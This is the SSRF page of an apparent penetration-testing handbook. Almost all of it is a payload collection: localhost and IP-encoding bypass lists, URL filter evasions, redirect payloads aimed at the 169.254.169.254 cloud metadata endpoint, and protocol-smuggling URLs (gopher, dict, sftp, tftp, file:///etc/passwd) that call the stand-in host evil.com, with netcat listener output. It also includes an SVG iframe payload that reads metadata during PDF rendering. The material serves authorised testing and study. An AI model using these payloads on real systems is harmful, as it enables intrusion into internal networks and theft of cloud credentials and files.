Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
DNS rebinding
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
SSRF

Tools

1
# https://github.com/tarunkant/Gopherus
2
gopherus --exploit [PLATFORM]
3
# https://github.com/daeken/SSRFTest
4
# https://github.com/jmdx/TLS-poison/
5
# https://github.com/m4ll0k/Bug-Bounty-Toolz
6
# https://github.com/cujanovic/SSRF-Testing
7
# https://github.com/bcoles/ssrf_proxy
8
​
9
gau domain.com | python3 ssrf.py collab.listener.com
10
​
11
# https://github.com/micha3lb3n/SSRFire
12
./ssrfire.sh -d domain.com -s yourserver.com -f /path/to/copied_raw_urls.txt
13
​
14
# SSRF Redirect Payload generator
15
# https://tools.intigriti.io/redirector/
Copied!

Summary

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.
1
# Web requesting other ip or ports like 127.0.0.1:8080 or 192.168.0.1
2
chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000
3
GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1
Copied!

SSRF Attacks

1
# Check if you're able to enum IP or ports
2
127.0.0.1
3
127.0.1
4
127.1
5
127.000.000.001
6
2130706433
7
0x7F.0x00.0x00.0x01
8
0x7F.1
9
0x7F000001
10
​
11
# Quick URL based bypasses:
12
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
13
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
14
http://google.com:80+&@google.com:80#[email protected]:22/
15
http://127.88.23.245:22/[email protected]:80/
16
http://127.88.23.245:22/#@www.google.com:80/
17
​
18
# 301 responses:
19
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
20
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
21
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
22
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
23
​
24
# 301 json:
25
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
26
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
27
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
28
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
29
​
30
# 301 csv:
31
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
32
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
33
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
34
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv
35
​
36
# 301 xml:
37
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
38
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
39
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
40
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml
41
​
42
# 301 pdf:
43
https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf
44
https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf
45
https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf
46
https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf
47
​
48
# 30x custom:
49
https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
50
​
51
# 20x custom:
52
https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
53
​
54
# 201 custom:
55
https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
56
​
57
# HTML iframe + URL bypass
58
http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/
59
​
60
# SFTP
61
http://whatever.com/ssrf.php?url=sftp://evil.com:11111/
62
​
63
evil.com:$ nc -v -l 11111
64
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
65
SSH-2.0-libssh2_1.4.2
66
​
67
# Dict
68
http://safebuff.com/ssrf.php?dict://attacker:11111/
69
​
70
evil.com:$ nc -v -l 11111
71
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
72
CLIENT libcurl 7.40.0
73
​
74
# gopher
75
# http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php
76
<?php
77
header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest');
78
?>
79
​
80
evil.com:# nc -v -l 12346
81
Listening on [0.0.0.0] (family 0, port 12346)
82
Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
83
HI
84
Multiline
85
test
86
​
87
# TFTP
88
# http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
89
​
90
evil.com:# nc -v -u -l 12346
91
Listening on [0.0.0.0] (family 0, port 12346)
92
TESTUDPPACKEToctettsize0blksize512timeout6
93
​
94
# file
95
http://safebuff.com/redirect.php?url=file:///etc/passwd
96
​
97
# ldap
98
http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit
99
​
100
# SSRF Bypasses
101
?url=http://safesite.com&site.com
102
?url=http://////////////site.com/
103
?url=http://[email protected]/account/edit.aspx
104
?url=http://site.com/account/edit.aspx
105
?url=http://safesite.com?.site.com
106
?url=http://safesite.com#.site.com
107
?url=http://safesite.com\.site.com/domain
108
?url=https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
109
?url=https://192.10.10.3/
110
?url=https://192.10.10.2?.192.10.10.3/
111
?url=https://192.10.10.2#.192.10.10.3/
112
?url=https://192.10.10.2\.192.10.10.3/
113
?url=http://127.0.0.1/status/
114
?url=http://localhost:8000/status/
115
?url=http://site.com/domain.php
116
<?php
117
header(‘Location: http://127.0.0.1:8080/status');
118
?>
119
​
120
# Localhost bypasses
121
0
122
127.00.1
123
127.0.01
124
0.00.0
125
0.0.00
126
127.1.0.1
127
127.10.1
128
127.1.01
129
0177.1
130
0177.0001.0001
131
0x0.0x0.0x0.0x0
132
0000.0000.0000.0000
133
0x7f.0x0.0x0.0x1
134
0177.0000.0000.0001
135
0177.0001.0000..0001
136
0x7f.0x1.0x0.0x1
137
0x7f.0x1.0x1
138
​
139
# Blind SSRF
140
- Review Forms
141
- Contact Us
142
- Password fields
143
- Contact or profile info (Names, Addresses)
144
- User Agent
145
​
146
# SSRF through video upload
147
# https://hackerone.com/reports/1062888
148
# https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS
149
​
150
# SSRF in pdf rendering
151
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="highcharts-root" width="800" height="500">
152
<g>
153
<foreignObject width="800" height="500">
154
<body xmlns="http://www.w3.org/1999/xhtml">
155
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
156
</body>
157
</foreignObject>
158
</g>
159
</svg>
Copied!
SSRF Bypasses
1
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
2
http://%73%68%6d%69%6c%6f%6e%2e%63%6f%6d
3
http://////////////site.com/
4
http://0000::1:80/
5
http://000330.0000072.0000326.00000343
6
http://000NaN.000NaN
7
http://0177.00.00.01
8
http://017700000001
9
http://0330.072.0326.0343
10
http://033016553343
11
http://0NaN
12
http://0NaN.0NaN
13
http://0x0NaN0NaN
14
http://0x7f000001/
15
http://0xd8.0x3a.0xd6.0xe3
16
http://0xd8.0x3a.0xd6e3
17
http://0xd8.0x3ad6e3
18
http://0xd83ad6e3
19
http://0xNaN.0xaN0NaN
20
http://0xNaN.0xNa0x0NaN
21
http://0xNaN.0xNaN
22
http://127.0.0.1/status/
23
http://127.1/
24
http://2130706433/
25
http://216.0x3a.00000000326.0xe3
26
http://3627734755
27
http://[::]:80/
28
http://localhost:8000/status/
29
http://NaN
30
http://safesite.com#.site.com
31
http://safesite.com&site.com
32
http://safesite.com?.site.com
33
http://safesite.com\.site.com/domain
34
http://shmilon.0xNaN.undefined.undefined
35
http://site.com/account/edit.aspx
36
http://site.com/domain.php
37
http://[email protected]/account/edit.aspx
38
http://[email protected]
39
https://192.10.10.2#.192.10.10.3/
40
https://192.10.10.2?.192.10.10.3/
41
https://192.10.10.2\.192.10.10.3/
42
https://192.10.10.3/
43
https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
44
<?php
45
header('Location: http://127.0.0.1:8080/status');
46
?>
47
​
48
# Tool
49
# https://h.43z.one/ipconverter/
Copied!

Mindmap

Previous
SQLi
Next
Open redirects
Last modified 11mo ago
Export as PDF
Copy link
Edit on GitHub
Contents
Tools
Summary
SSRF Attacks
Mindmap